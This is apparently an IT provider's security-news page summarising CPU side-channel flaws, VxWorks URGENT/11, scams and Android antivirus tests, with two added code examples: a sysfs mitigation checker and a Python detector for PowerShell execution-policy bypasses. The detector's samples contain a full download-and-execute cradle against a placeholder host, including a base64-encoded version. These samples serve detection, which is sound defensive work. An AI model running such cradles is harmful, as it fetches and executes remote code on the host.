SWAPGS attack allows kernel memory to be leaked
8/8/19: "Security researchers have found a new way to abuse the speculative execution mechanism of modern CPUs to break security boundaries and leak the contents of kernel memory. The new technique abuses a system instruction called SWAPGS and can bypass mitigations put in place for previous speculative execution vulnerabilities like Spectre."
"SWAPGS allows the kernel to gain access to internal, per-CPU data structures, when a process transitions from user-mode to kernel mode. However, researchers from Bitdefender found that the instruction’s behavior when executed speculatively is poorly documented and has security implications."
"Windows most vulnerable to SWAPGS vulnerability" - “A quick analysis of the Linux kernel revealed that although it contains a gadget which may be used in an attack, it lies inside the Non-Maskable Interrupt (NMI) handler,” Bitdefender [white paper] researchers said in their paper. “We therefore believe that Linux would be difficult (if not impossible) to attack.”
[Source: CSO Online]
Researchers have found 11 serious vulnerabilities in VxWorks, the real-time operating system that powers over 2 billion devices
7/29/19: "While VxWorks is used in over 2 billion devices, Wind River said in an emailed press release that these vulnerabilities only impact "a small subset" of its customer base, primarily "enterprise devices located at the perimeter of organizational networks that are internet-facing such as modems, routers, and printers, as well as some industrial and medical devices." However, Armis estimates the flaws expose over 200 million "mission-critical" devices. Researchers at Armis dubbed these flaws URGENT/11."
"Not all of the vulnerabilities exist in all VxWorks versions, but most versions are affected by at least one of them. The remote code execution flaws can be exploited by simply sending maliciously crafted TCP packets to a vulnerable device, without any additional changes needed to their default configurations."
"According to Armis [IoT security firm], vulnerable devices include industrial SCADA systems, elevator and industrial controllers, patient monitors and MRI machines, firewalls, routers, satellite modems, VOIP phones, printers and more. Prior to 2006, when Wind River acquired the vulnerable TCP/IP stack called IPnet, the stack was also licensed and distributed to other real-time operating system (RTOS) vendors, so there is a high possibility that devices running other real-time operating systems are also vulnerable."
[Source: CSO Online]
Over 25,000 Linksys Smart Wi-Fi routers vulnerable to sensitive information disclosure flaw
Read the full report here.
5/18/19: If you own a Linksys router listed below, we strongly urge you to replace it with any other router (except those made by Cisco) so that your network is safe.
'Zombieload' - Affects Intel CPUs
5/15/19: "...academics say that all Intel CPUs released since 2011 are most likely vulnerable." If you use AMD or any other CPU, you are not affected and can stop reading this article.
Academics have discovered a new class of vulnerabilities in Intel processors that can allow attackers to retrieve data being processed inside a CPU.
The leading attack in this new vulnerability class is a security flaw named Zombieload, which is another side-channel attack in the same category as Meltdown, Spectre, and Foreshadow.
'Zombieload' is what researchers have named a Microarchitectural Data Sampling (MDS) attack, and targets a CPU's microarchitectural data structures, such as the load, store, and line fill buffers, which the CPU uses for fast reads/writes of data being processed inside the CPU. These are smaller-sized caches that are used alongside the main CPU cache.
Microsoft, Apple, and the Linux project are expected to have operating system updates roll out later today, or in the coming days." [Source: ZDnet]
No More Ransom Portal
Download & run this vaccination batch file for Petya & NotPetya.
WannaDecrypt0r (WannaCry) patches for [Windows XP, Windows 8, and Windows Server 2003]
WannaDecrypt0r (WannaCry) patch [security bulletin MS17-010] for Windows Vista, Windows 7, Windows 8.1, Windows 10, Windows Server 2008, Windows Server 2012, and Windows Server 2016.
3/26/19: "To help owners of Android devices to distinguish between genuine, effective Android antivirus apps on the one hand, and dubious/ineffective ones on the other, AV-Comparatives have again tested the effectiveness of antimalware programs for Android, in the 2019 Android Test. For this test, we searched for and downloaded 250 antimalware security apps by various different developers from the Google Play Store. 80 apps detected over 30% of malicious apps, and had zero false alarms." [The list can be found here.]
"The anti-malware apps from the following 138 vendors detected less than 30% of the Android malware samples, or had a relatively high false alarm rate on popular clean files from the Google Play Store (please note that some company names are quite generic): 1Machine System Sdn Bhd, actionappsgamesstudio, Amantechnoapps, AMIGOS KEY, Amnpardaz Soft, AndroHelm Security, ANTI VIRUS Security, Antivirus Mobile Lab, antivirus security, appflozen, appsshow, Appzila, Arcane Apps, AS team security phone Lab, asuizksidev, Ayogames, AZ Super Tools, azemoji studio, Baboon Antivirus, bESapp, Best Battery Apps, Best HD Wallpapers APPS, Best Tools Pro, BestOne, Bit Inception, BKAV, Bom Bom, Booster studio Laboratory Inc., brouno, Bulletproof AV, Caltonfuny Antivirus Phone, Cheetah Mobile, CHOMAR, Chromia, Cloud 7 Services, Core Antivirus Lab, CPCORP TEAM, Photo blur & photo blender, CreativeStudioApps, CY Security, Defenx, DefineSoft, DreamBig Studios, DU Master, electro dev, Erus IT Private Limited, Falcon Security Lab, Fast n Clean, fluer-apps.com, Formation App, Free Apps Drive, FrouZa, Galaxy TEAM, GameXpZeroo, GlobalsApps, gndnSoftware, GOMO Apps, GoNext App Developers, Gridinsoft, LLC, handy tools apps, Hello Security, Immune Smart, INCA Internet, infiniteWays007, Islamic Basic Education, Itus Mobile Security, JESKO, jixic, Kolony Cleaner, Koodous Mobile, lempea, LINE, LIONMOBI, Live multi Player Game, Main Source 365 Tech, Mama Studio, MAN Studio, Marsolis Tech, Max Antivirus Lab, Max Mobi Secure, MaxVV, Mob Utilities, Mobile Tools Plus, Mobtari, Mond Corey, M-Secure, MSolutions, MSYSOFT APPS, My Android Antivirus, NCN-NetConsulting, Nepelion Camp, Nisi Jsc, Niulaty, NP Mobile Security, NPC Studios, Omha, Oxic Studio, Pix2Pic Studio, playyourapp, Pro Tool Apps, prote apps, Protector & Security for Mobile, Puce, Radial Apps 2018, RedBeard, Secure Cloud, SecureBrain2, Security and Antivirus for Android solutions, Security Apps Team, Security Defend, SECURITY LAB, Security Systems Lab, SecurityApplock, Sept Max, ShieldApps, SjaellSoft, SkyMobileTeam, Smart Battery Solution & Creative Screen Lock, smarteazyapps, Software Center, Soft War, stmdefender, Systweak Software, TAIGA SYSTEM, Tokyo Tokyo, Tools dev, tools for android, Utilitarian Tools, Vainfotech, VHSTUDIO, Vikrant Waghmode, Virinchi Software, Virtues Media & Application, VSAR, Wingle Apps, Xtechnoz Apps, XZ Game, Z Team Pro."
MARCHER TROJAN MALWARE ON ANDROID
Super Mario Run, a mobile game by Nintendo, is currently only available to Apple iOS users; Android users must wait for their version. Third-party web sites already claim the Android app is available. Do not download it: this fake app is actually the "Marcher" Trojan malware.
Only get your Android apps from the Google Play Store, and ignore web sites that claim anything else.
When installed, the Marcher app requires you to grant it administrative access, which means whoever is behind Marcher can monitor the device and steal login data not just for banking and payment apps, but also for apps including Facebook, WhatsApp, Skype, Gmail, the Google Play store, and more. Criminals can exploit all of these stolen details to carry out additional fraud.
[Read more about it here.]
SSA PHONE SCAM
12/31/18: Be on the lookout for phone scammers pretending to be from the United States Social Security Administration. The SSA said that more than 35,000 people reported the scam in 2018, compared to just over 3,000 in 2017.
The scammers will often say your Social Security number is about to be suspended because of suspicious activity.
Your Social Security number will never be suspended and you do not have to verify your number to anyone who calls. The Social Security Administration will never call to threaten your benefits or tell you to wire money or send cash.
3 More Flaws Found in Intel CPUs
8/14/18: "Today, Intel and our industry partners are sharing more details and mitigation information about a recently identified speculative execution side-channel method called L1 Terminal Fault (L1TF). This method affects select microprocessor products supporting Intel® Software Guard Extensions (Intel® SGX) and was first reported to us by researchers at KU Leuven University, Technion – Israel Institute of Technology, University of Michigan, University of Adelaide and Data61. Further research by our security team identified two related applications of L1TF with the potential to impact other microprocessors, operating systems and virtualization software." Read More Details Here.
AMD Ryzen & Epyc Processors Affected with Security Vulnerabilities
3/13/18: "A newly discovered set of vulnerabilities in AMD chips is making waves not because of the scale of the flaws, but rather the rushed, market-ready way in which they were disclosed by the researchers. When was the last time a bug had its own professionally shot video and PR rep, yet the company affected was only alerted 24 hours ahead of time? The flaws may be real, but the precedent set here is an unsavory one." [TechCrunch]
AMD's response: "We have just received a report from a company called CTS Labs claiming there are potential security vulnerabilities related to certain of our processors. We are actively investigating and analyzing its findings. This company was previously unknown to AMD and we find it unusual for a security firm to publish its research to the press without providing a reasonable amount of time for the company to investigate and address its findings. At AMD, security is a top priority and we are continually working to ensure the safety of our users as potential new risks arise. We will update this blog as news develops." [AMD]
Meltdown & Spectre
1/29/18: Microsoft issued an out-of-band update over the weekend that disables Intel's mitigation for CVE-2017-5715, the Spectre Variant 2 attack described as a "branch target injection vulnerability". The update disables Intel's patch and is available for Windows 7 SP1, Windows 8.1, and all versions of Windows 10, for client and server. Not only was Intel's fix for the Spectre attack causing reboots and stability issues, Microsoft also found it could result in the worse outcome of data loss or corruption in some circumstances. [Source: ZDnet]
Intel Flaw Patches
1/24/18: If you have a PC from one of the major manufacturers [Dell, HP, or Lenovo] that released patches for their Intel-powered PCs, "...chances are very good that the BIOS or UEFI firmware update you installed earlier this month is bad. If you flashed your BIOS or UEFI this month, you’ll almost undoubtedly have to flash it again just to get rid of the buggy code. Then you’ll have to upgrade the firmware once again, at a later time." [source: Computerworld]
1/23/18: Intel executive vice president Navin Shenoy said on Monday that the chip-maker has identified the root cause of some of the recent problems, so it is now recommended that users skip the currently available patches. "We recommend that OEMs, cloud service providers, system manufacturers, software vendors and end users stop deployment of current versions, as they may introduce higher than expected reboots and other unpredictable system behavior." Source: Intel
1/6/18: Kicking off 2018 with a bang, we get word from many sources of two new ways to exploit PCs running specific CPU types. The larger problem is "Meltdown", which affects Intel CPUs, yet Microsoft appears to be issuing a patch for both exploits to all CPUs; AMD CPUs are not affected by Meltdown, so those systems will slow down as well. Thanks, Microsoft!
Updating list of Patches.
Spectre and Meltdown explained
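The Zombieload/MDS, L1TF and Meltdown/Spectre entries on this page all come down to the same practical question on a given machine: does the kernel consider itself mitigated, or is it still exposed? As an added example, not from this page or any of the sources it quotes, the POSIX shell functions below read the status files Linux publishes under /sys/devices/system/cpu/vulnerabilities/ (the directory and file names meltdown, spectre_v1, spectre_v2, l1tf and mds are real kernel interfaces; taking the directory as a parameter, and the sample values used for testing, are assumptions made here):

```shell
# Added example (not from the page or its sources): ask the running Linux
# kernel which speculative-execution issues it still considers open. Since
# 2018 the kernel publishes one file per issue under
# /sys/devices/system/cpu/vulnerabilities/ (meltdown, spectre_v1, spectre_v2,
# l1tf, mds, ...), each containing "Not affected", "Mitigation: ..." or
# "Vulnerable...". The directory is a parameter so the same functions can be
# pointed at a constructed copy for testing.
#
# Usage on a live host:  . ./spec_check.sh && spec_report

# spec_status DIR NAME
#   prints "NAME: <kernel status>" and returns 0 for "Not affected" or
#   "Mitigation: ...", 1 for "Vulnerable...", and 2 when the file is missing
#   (a kernel that predates the advisory knows nothing about it; that is
#   "unknown", not "safe").
spec_status() {
    dir=$1
    name=$2
    if [ ! -r "$dir/$name" ]; then
        echo "$name: unknown (no sysfs entry; kernel predates this advisory)"
        return 2
    fi
    status=$(cat "$dir/$name")
    echo "$name: $status"
    case $status in
        "Not affected"*|Mitigation:*) return 0 ;;
        *) return 1 ;;
    esac
}

# spec_report [DIR]
#   checks the issues this page covers (Meltdown, Spectre v1/v2, L1TF, MDS),
#   prints one line each and returns the count still reported "Vulnerable".
spec_report() {
    dir=${1:-/sys/devices/system/cpu/vulnerabilities}
    bad=0
    for name in meltdown spectre_v1 spectre_v2 l1tf mds; do
        rc=0
        spec_status "$dir" "$name" || rc=$?
        if [ "$rc" -eq 1 ]; then
            bad=$((bad + 1))
        fi
    done
    return "$bad"
}
```

A non-zero exit status from spec_report means at least one issue is still reported as Vulnerable; a missing entry (status 2 from spec_status) means the kernel is too old to know about that issue at all, which is a finding in itself rather than a clean result. Microcode and firmware updates change what these files say, so re-run after the vendor patches discussed above are applied or rolled back.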
CHROME FAKE FONT SCAM
If you have ever been on a web page and seen strange characters in the text, it usually means the author is using a different text encoding (Agrisea, for example, uses Western; in Firefox, Text Encoding is under the View menu). However, NeoSmart Technologies (an Agrisea technology partner) shows examples of the latest scam affecting the Chrome web browser:
Random characters on a grayed-out web page, with a white box showing the Chrome logo and a "font missing" warning. Except it is all a scam: do not download anything, and close that page. An example:
According to the Microsoft Malware Protection Center, a new wave of spam emails carries .LNK files inside ZIP archives, with malicious PowerShell commands embedded in the shortcut files. "You may think that you are protected from fileless malware because your PowerShell execution policies are set to 'Restricted' so that scripts can't run," the Intel Security researchers said in a blog post. "However, attackers can easily bypass these policies."
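The bypass the Intel Security researchers mention is not a bug to be patched: PowerShell's execution policy is a usability guard, not a security boundary. It is overridden per process with -ExecutionPolicy Bypass, made irrelevant by passing the script text directly via -Command or -EncodedCommand (base64 over UTF-16LE), or sidestepped by piping script text on stdin. What a defender can do is watch process command lines for those patterns and decode the encoded ones. The following is an added example, not code from this page or from Microsoft or Intel Security; the command lines it scores are constructed samples, and the hostname example.invalid is a placeholder:

```python
"""Added example (not from the page or the sources it quotes): triage
PowerShell command lines for the execution-policy bypasses the Intel Security
quote alludes to. ExecutionPolicy is a usability guard, not a security
boundary: it is overridden per process with -ExecutionPolicy Bypass, made
irrelevant by passing the script text via -Command or -EncodedCommand, or
sidestepped by piping script text on stdin. The command lines below are
constructed samples; the hostname example.invalid is a placeholder."""
import base64
import binascii
import re
from typing import Dict, List, Optional

# Indicators that make a Restricted policy irrelevant or hide what is run.
# A dict so the report can say which ones fired, in this order.
INDICATORS: Dict[str, re.Pattern] = {
    # -ExecutionPolicy Bypass / Unrestricted (and the accepted abbreviations)
    "exec_policy_override": re.compile(
        r"-(?:ex|exec|ep|executionpolicy)\s+(?:bypass|unrestricted)", re.I),
    # -EncodedCommand <base64 of UTF-16LE script>
    "encoded_command": re.compile(
        r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I),
    # -WindowStyle Hidden: the console never appears on screen
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    # -NoProfile: skip profile scripts a defender might have instrumented
    "no_profile": re.compile(r"-no(?:p|profile)\b", re.I),
    # Download cradles: fetch stage two straight into memory
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
    # Invoke-Expression on fetched text: the classic fileless step
    "invoke_expression": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
}


def encode_command(script: str) -> str:
    """Produce what -EncodedCommand expects: base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand, or None if there is none
    (or the blob is not valid base64/UTF-16LE, which is itself odd)."""
    m = INDICATORS["encoded_command"].search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyse(cmdline: str) -> Dict[str, object]:
    """Score one process command line (e.g. Sysmon event 1 / 4688 CommandLine).
    Indicators are matched against the visible command line plus the decoded
    payload, so an encoded download cradle is caught as well as a plain one."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else f"{cmdline} {decoded}"
    hits: List[str] = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    return {
        "indicators": hits,
        "decoded": decoded,
        # Any encoded command, or two or more indicators together, is worth
        # an alert; a lone -NoProfile is everyday administration.
        "suspicious": decoded is not None or len(hits) >= 2,
    }


# Constructed samples, not captured telemetry.
STAGE_TWO = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/b')"
SAMPLE_COMMAND_LINES = [
    # Benign: an admin running a script file under whatever policy applies.
    r"powershell.exe -File C:\Scripts\Backup.ps1",
    # What a malicious .lnk target typically looks like: policy forced off,
    # window hidden, stage two pulled from the network and executed in memory.
    'powershell.exe -nop -w hidden -ExecutionPolicy Bypass -c '
    '"IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/a\')"',
    # Same intent, encoded: nothing incriminating is visible until decoded.
    "powershell.exe -NoP -NonI -W Hidden -Enc " + encode_command(STAGE_TWO),
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        result = analyse(line)
        print(result["suspicious"], result["indicators"])
        if result["decoded"]:
            print("  decoded:", result["decoded"])
```

Feed analyse() the CommandLine field from process-creation events and alert on the "suspicious" flag; the decoded payload is what the analyst actually needs to read, since the encoded form is deliberately opaque. Note that none of this depends on the policy setting itself, which is exactly the point the researchers make.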
HACKING, SPIES, & CYBERCRIMINALS
1) First thing you must know: keeping your accounts safe must be your top priority, so if you get an email asking you for your login or password, delete it. No one you already do business with is going to ask you for that information. And if it is someone in your company asking, walk over and ask them why they want it; they might be infected and not even know it.
2) If an email sounds like it is from one of your friends but seems slightly off, call them on your phone to ask, and don't click on links in that email. The email might be a phishing attempt by a spy, and not the James Bond type either.
3) Seriously, change your password often (that means more than once a year) and don't use the same password everywhere.
4) H.R. departments are coming under attack by fake job applications that arrive in email, usually with a PDF attachment (like a cover letter) plus a Microsoft Office document. When the document (Excel, Word, etc.) is opened, it says macros must be enabled, and if you enable them, ransomware encrypts your computer. See article 2 below for more.
The "bad guys" out there in cyberspace want to steal whatever they can get from you and from where you work. If they can get a virtual foot in the door on something you use, like your phone, it opens up your whole world for them to exploit. That will cost you: money, identity theft, or maybe something even worse.
So, next time Agrisea tells you to change your password, don't make a face; we are trying to keep you safer in an increasingly hostile world.
Read more about what is happening in these articles on ZDnet: 1 & 2.
Still running Windows 7 or 8.x? You should use a small piece of software [download it] to prevent Windows 10 pieces from being installed to your computer.